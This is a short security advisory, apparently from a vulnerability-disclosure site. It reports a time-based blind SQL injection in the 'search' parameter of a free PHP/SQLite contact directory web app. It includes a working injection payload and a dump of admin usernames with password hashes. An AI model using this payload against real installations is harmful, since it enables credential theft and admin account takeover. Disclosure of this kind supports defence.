Local Offices Contact Directory Site SQL Injection

2021.10.05
Credit: nu11secur1ty
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-89

https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html ## Vendor: [href](https://www.sourcecodester.com/php/14973/local-offices-contact-directory-site-using-php-and-sqlite-free-source-code.html) ## Description: The `search` parameter appears to be vulnerable to time-based blind SQL injection attacks, on the web app "Local Offices Contact Directories Site" (by oretnom23). The malicious attacker can execute a malicious payload and he can dump hashes authentication credentials. Then the attacker can to take control of the admin account of the system and can steal sensitive information and can destroy the system administrative account. ## Payload: ```sql --- Parameter: search (GET) Type: time-based blind Title: SQLite > 2.0 AND time-based blind (heavy query) Payload: search=481614'||(SELECT CHAR(79,85,82,97) WHERE 8245=8245 AND 4378=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))))||' --- ``` - dump ```sql Table: admin_list [2 entries] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | | cblake | cd74fae0a3adf459f73bbf187607ccea | +----------+----------------------------------+ ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/fool-CVE-nu11-100421) ## Proof: [href](https://streamable.com/zmm464) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top